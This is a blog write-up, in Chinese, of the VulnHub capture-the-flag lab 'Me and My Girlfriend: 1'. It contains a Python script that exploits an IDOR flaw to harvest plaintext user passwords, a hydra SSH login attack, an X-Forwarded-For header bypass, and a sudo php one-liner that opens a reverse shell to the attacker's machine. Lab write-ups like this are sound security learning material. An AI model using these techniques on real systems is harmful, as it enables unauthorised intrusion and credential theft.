Me-and-My-Girlfriend-1

Me-and-My-Girlfriend-1

下载地址:Me and My Girlfriend: 1 ~ VulnHub

1 信息收集

image-20220213122008295

1.1 端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap -sV -T4 -p - 192.168.0.3                 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:54 CST
Nmap scan report for 192.168.0.3
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2 后台目录扫描

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.0.3/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

[20:43:35] Starting: 
[20:43:35] 301 -  308B  - /misc  ->  http://192.168.0.3/misc/
[20:43:38] 301 -  310B  - /config  ->  http://192.168.0.3/config/
[20:56:50] 200 -  120B  - /index.php
[20:56:58] 200 -   32B  - /robots.txt
[20:47:35] 403 -  291B  - /server-status

Task Completed

1.2.1 目录分析

  1. 访问http://192.168.0.3/发现有IP限制,查看页面代码信息,发现需要利用X-Forwarded-For Header绕过

    image-20220307205308871

  2. 火狐下载插件:X-Forwarded-For Header,并配置IP地址为:127.0.0.1,请求头选择X-Forwarded-For

    image-20220307215124805

  3. 利用X-Forwarded-For Header插件成功访问到目标网站:http://192.168.0.3/?page=index

    image-20220307214708338

  4. 在目标网站上注册test用户

    image-20220307215906713

  5. 成功登录后台:http://192.168.0.3/index.php?page=dashboard

    image-20220307220148973

  6. http://192.168.0.3/index.php?page=profile&user_id=12页面尝试水平越权,将user_id=12改为user_id=1

    image-20220307215958858

    image-20220307220106909

    # 通过水平越权得到注册的用户信息如下:
    Eweuh Tandingan
    eweuhtandingan
    skuyatuh
    
  7. 编写脚本尝试获取所有用户的账号密码:

    import requests, re
    
    
    def get_user_pass(uid):
        uid = uid
        t_url = 'http://192.168.0.3/index.php?page=profile&user_id=%s' % uid
        t_cookie = {
            "PHPSESSID":"ua2kg2n1inkvdbdcohitotsgg5"
        }
        t_headers = {"X-Forwarded-For":"127.0.0.1"}
        getreq = requests.get(url=t_url, cookies=t_cookie,headers=t_headers).text
        # match name
        getname = re.search( "id=\"name\" value=\"(.*?)\">",getreq).group(1)
        # match username
        getusername = re.search( "id=\"username\" value=\"(.*?)\">",getreq).group(1)
        # match passwd
        getpasswd = re.search( "id=\"password\" value=\"(.*?)\">",getreq).group(1)
        return getname,getusername,getpasswd
    if __name__ == '__main__':
        for i in range(20):
            getname,getusername,getpasswd = get_user_pass(i)
            if getname:
                print("%s:%s"%(getusername,getpasswd))
    
  8. 得到以下结果:

    eweuhtandingan:skuyatuh
    aingmaung:qwerty!!!
    sundatea:indONEsia
    sedihaingmah:cedihhihihi
    alice:4lic3
    abdikasepak:dorrrrr
    test:Admin123
    
  9. http://192.168.0.3/robots.txt

    image-20220307214508631

  10. http://192.168.0.3/heyhoo.txt

    image-20220307214435473

2 GetShell

2.1 利用收集的信息尝试ssh登录目标主机

# hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -C user-pass ssh://192.168.0.3

# 得到:ssh登录账号与密码
alice:4lic3
  • -C: FILE 文件格式为 "login:pass"

image-20220309230942710

2.2 成功登录

# 获得第一个flag
alice@gfriEND:~$ cat .my_secret/flag1.txt 
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

3 提权

3.1 尝试提权

sudo su -提权失败

3.2 收集当前系统信息

  1. 查看/etc/passwd

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:
    syslog:x:101:104::/home/syslog:/bin/false
    messagebus:x:102:106::/var/run/dbus:/bin/false
    landscape:x:103:109::/var/lib/landscape:/bin/false
    alice:x:1000:1001:Alice Geulis,1337,+62,+62:/home/alice:/bin/bash
    eweuhtandingan:x:1001:1002:,,,:/home/eweuhtandingan:/bin/bash
    aingmaung:x:1002:1003:,,,:/home/aingmaung:/bin/bash
    sundatea:x:1003:1004:,,,:/home/sundatea:/bin/bash
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
    
  2. SUID提权:没啥可利用的

    alice@gfriEND:~$ find / -perm -u=s 2>/dev/null
    /bin/ping6
    /bin/ping
    /bin/umount
    /bin/mount
    /bin/su
    /bin/fusermount
    /usr/bin/chsh
    /usr/bin/gpasswd
    /usr/bin/mtr
    /usr/bin/pkexec
    /usr/bin/at
    /usr/bin/traceroute6.iputils
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/sudo
    /usr/sbin/uuidd
    /usr/sbin/pppd
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    
  3. 查看当前系统中的用户所创建的文件:没啥东东

    alice@gfriEND:~$ find / -user 1000  2>/dev/null
    /home/alice
    /home/alice/.bashrc
    /home/alice/.cache
    /home/alice/.cache/motd.legal-displayed
    /home/alice/.bash_logout
    /home/alice/.bash_history
    /home/alice/.profile
    /home/alice/.my_secret
    /home/alice/.my_secret/my_notes.txt
    alice@gfriEND:~$ find / -user 1001 2>/dev/null
    /home/eweuhtandingan
    /home/eweuhtandingan/.bashrc
    /home/eweuhtandingan/.bash_logout
    /home/eweuhtandingan/.profile
    alice@gfriEND:~$ find / -user 1002 2>/dev/null
    /home/aingmaung
    /home/aingmaung/.bashrc
    /home/aingmaung/.bash_logout
    /home/aingmaung/.profile
    alice@gfriEND:~$ find / -user 1003 2>/dev/null
    /home/sundatea
    /home/sundatea/.bashrc
    /home/sundatea/.bash_logout
    /home/sundatea/.profile
    alice@gfriEND:~$ 
    
  4. 查找敏感文件

    alice@gfriEND:/var/www/html$ cat config/config.php 
    <?php
    
        $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
    alice@gfriEND:/var/www/html$ 
    
  5. 查看当前alice用户是否拥有sudo权限

    alice@gfriEND:~$ sudo -l
    Matching Defaults entries for alice on gfriEND:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User alice may run the following commands on gfriEND:
        (root) NOPASSWD: /usr/bin/php
    

3.3 sudo php提权

alice@gfriEND:~$ sudo php -r '$sock=fsockopen("192.168.0.2",2333);exec("/bin/bash -i <&3 >&3 2>&3");'
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.0.2] from (UNKNOWN) [192.168.0.3] 57734
root@gfriEND:~# cat flag2.txt 

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:/root# 
posted @ 2022-03-10 07:57  f_carey  阅读(64)  评论(0编辑  收藏  举报